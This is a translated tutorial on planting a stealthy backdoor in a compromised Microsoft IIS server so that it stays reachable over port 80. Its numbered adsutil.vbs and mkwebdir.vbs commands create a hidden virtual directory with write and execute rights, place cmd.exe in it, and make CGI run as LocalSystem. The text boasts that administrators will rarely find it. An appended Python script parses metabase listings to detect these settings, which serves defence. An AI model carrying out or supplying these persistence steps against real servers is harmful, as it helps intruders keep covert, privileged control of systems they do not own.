IIS is a popular WWW server with many vulnerabilities caused by improper configuration. Leaving a backdoor after an IIS server has been compromised lets you control it at any time. Backdoor programs generally open a special port for listening; NC, NTLM and RNC, for example, all use Telnet-style listeners on the server for remote control. However, a strictly protected WWW site (once its administrators have been burned) usually restricts ports at the firewall, so nothing except the ports the administrator opened can be reached. Port 80, however, cannot be closed (unless the administrator has lost his mind), so a backdoor left on port 80 stays usable indefinitely.
When IIS starts a CGI application, it uses the CreateProcessAsUser API by default to create a new process for the CGI, and the security context of that program is determined by the user who started the CGI. Anonymous users are normally mapped to the IUSR_computername account (the administrator can of course change this to another user), or an authenticated user is supplied by the browser. Both kinds of user have low privileges and typically belong to the Guests group. In fact, IIS can be modified so that CGI runs with elevated privileges: the main IIS process runs under the LocalSystem account, so the CGI can be made to run with the highest privilege, LocalSystem.
After a web server has been compromised, you usually bind a cmd to a port to control the server remotely. That control can be a GUI (such as 3389) or a text console like Telnet (such as RNC). NC must be usable; in practice this is enough.
1. telnet to the server
2. cscript.exe adsutil.vbs Enum w3svc/1/root
KeyType: (string) "IIsWebVirtualDir"
AppRoot: (string) "/lm/w3svc/1/root"
AppFriendlyName: (string) "Default Application"
AppIsolated: (integer) 2
AccessRead: (Boolean) True
AccessWrite: (Boolean) False
AccessExecute: (Boolean) False
AccessScript: (Boolean) True
AccessSource: (Boolean) False
AccessNoRemoteRead: (Boolean) False
AccessNoRemoteWrite: (Boolean) False
AccessNoRemoteExecute: (Boolean) False
AccessNoRemoteScript: (Boolean) False
HttpErrors: (list) (32 items)
"400, *, file, C:\WINNT\help\iisHelp\common\400.htm"
"401,1, file, C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2, file, C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3, file, C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4, file, C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5, file, C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1, file, C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2, file, C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3, file, C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4, file, C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5, file, C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6, file, C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7, file, C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8, file, C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9, file, C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10, file, C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11, file, C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12, file, C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13, file, C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15, file, C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16, file, C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17, file, C:\WINNT\help\iisHelp\common\403-17.htm"
"404, *, file, C:\WINNT\help\iisHelp\common\404b.htm"
"405, *, file, C:\WINNT\help\iisHelp\common\405.htm"
"406, *, file, C:\WINNT\help\iisHelp\common\406.htm"
"407, *, file, C:\WINNT\help\iisHelp\common\407.htm"
"412, *, file, C:\WINNT\help\iisHelp\common\412.htm"
"414, *, file, C:\WINNT\help\iisHelp\common\414.htm"
"500,12, file, C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13, file, C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15, file, C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100, URL, /IISHelp/common/500-100.asp"
FrontPageWeb: (Boolean) True
Path: (string) "C:\inetpub\wwwroot"
AccessFlags: (integer) 513
[/W3svc/1/root/localstart.asp]
[/W3svc/1/root/_vti_pvt]
[/W3svc/1/root/_vti_log]
[/W3svc/1/root/_private]
[/W3svc/1/root/_vti_txt]
[/W3svc/1/root/_vti_script]
[/W3svc/1/root/_vti_cnf]
[/W3svc/1/root/_vti_bin]
I won't explain the output above line by line!
Now we know exactly what we are dealing with. The administrator is out of luck.
3. mkdir C:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c mycomputer -w "Default Web Site" -v "virtual dir1","C:\inetpub\wwwroot\dir1"
This creates a virtual directory named virtual dir1.
You can verify it with the Enum command from step 2.
5. Next, change the access attributes of virtual dir1 so that it allows execution.
cscript.exe adsutil.vbs set w3svc/1/root/virtual dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/virtual dir1/accessexecute "true" -s:
Now you can upload content to this directory and run it, or copy cmd.exe and net.exe straight into the virtual directory's folder on disk.
6. The following command forces IIS to create new CGI processes in its own security context (instead of the requesting user's) by modifying the IIS metabase:
cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false
Note: cscript is the Windows Script Host; adsutil.vbs is the Windows IIS administration script; /w3svc/1/root/[your directory]/createprocessasuser is the IIS metabase path of the property being set.
Such a backdoor is almost impossible to discover unless you inspect every virtual directory (only a thoroughly paranoid administrator will check them all).
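The inspection the last sentence describes can be automated. The following added example (not code from the original page) parses the property listing format that adsutil.vbs Enum prints, as shown in step 2, and flags the two metabase settings this page relies on: a virtual directory with both AccessWrite and AccessExecute enabled, and a directory whose CreateProcessAsUser property has been set to False. The sample listing is constructed for the example; the function names parse_enum and audit are the example's own, and the layout of one [path] header per node followed by its properties is assumed to mirror the page's output.

```python
"""Audit helper for IIS metabase listings produced by adsutil.vbs Enum.

Added example, not part of the original page. It reads the text output of
`cscript adsutil.vbs Enum <path>` (one "[/W3svc/...]" header per node followed by
"Name: (Type) value" lines, as shown on the page) and reports virtual directories
whose settings match the backdoor pattern described there.
"""
import re
from typing import Any, Dict, List, Tuple

# Constructed sample in the page's output format (not real server output).
SAMPLE_ENUM_OUTPUT = """\
[/W3svc/1/root]
KeyType: (string) "IIsWebVirtualDir"
AccessRead: (Boolean) True
AccessWrite: (Boolean) False
AccessExecute: (Boolean) False
AccessScript: (Boolean) True
AccessFlags: (integer) 513
Path: (string) "C:\\inetpub\\wwwroot"
[/W3svc/1/root/virtual dir1]
KeyType: (string) "IIsWebVirtualDir"
AccessRead: (Boolean) True
AccessWrite: (Boolean) True
AccessExecute: (Boolean) True
CreateProcessAsUser: (Boolean) False
Path: (string) "C:\\inetpub\\wwwroot\\dir1"
[/W3svc/1/root/images]
KeyType: (string) "IIsWebVirtualDir"
AccessRead: (Boolean) True
AccessWrite: (Boolean) False
AccessExecute: (Boolean) False
Path: (string) "C:\\inetpub\\wwwroot\\images"
"""

NODE_RE = re.compile(r"^\[(.+)\]$")                       # [/W3svc/1/root/...]
PROP_RE = re.compile(r"^(\w+):\s*\((\w+)\)\s*(.*)$")      # Name: (Type) value


def _coerce(kind: str, raw: str) -> Any:
    """Convert the textual value according to the type adsutil prints."""
    kind = kind.lower()
    raw = raw.strip()
    if kind == "boolean":
        return raw.lower() == "true"
    if kind == "integer":
        return int(raw)
    if kind == "string":
        return raw.strip('"')
    return raw  # (list) and anything else: keep the raw text


def parse_enum(text: str) -> Dict[str, Dict[str, Any]]:
    """Return {metabase_path: {property_name_lowercase: typed_value}}.

    Quoted HttpErrors entries and other non-property lines are skipped.
    """
    nodes: Dict[str, Dict[str, Any]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = NODE_RE.match(line)
        if m:
            current = m.group(1)
            nodes.setdefault(current, {})
            continue
        m = PROP_RE.match(line)
        if m and current is not None:
            name, kind, raw = m.groups()
            nodes[current][name.lower()] = _coerce(kind, raw)
    return nodes


def audit(nodes: Dict[str, Dict[str, Any]]) -> List[Tuple[str, str]]:
    """Flag the two settings the page's backdoor depends on."""
    findings: List[Tuple[str, str]] = []
    for path, props in nodes.items():
        # Write + execute on one directory lets uploaded files be run.
        if props.get("accesswrite") and props.get("accessexecute"):
            findings.append((path, "write-and-execute"))
        # CreateProcessAsUser=False runs CGI in the IIS process context.
        if props.get("createprocessasuser") is False:
            findings.append((path, "createprocessasuser-false"))
    return findings


if __name__ == "__main__":
    for path, issue in audit(parse_enum(SAMPLE_ENUM_OUTPUT)):
        print(f"{path}: {issue}")
```

On a real server the script would be fed the output of adsutil.vbs enumerated recursively over the whole W3SVC tree rather than the constructed sample; the property names it checks are the ones shown in step 2 and step 6 of the page.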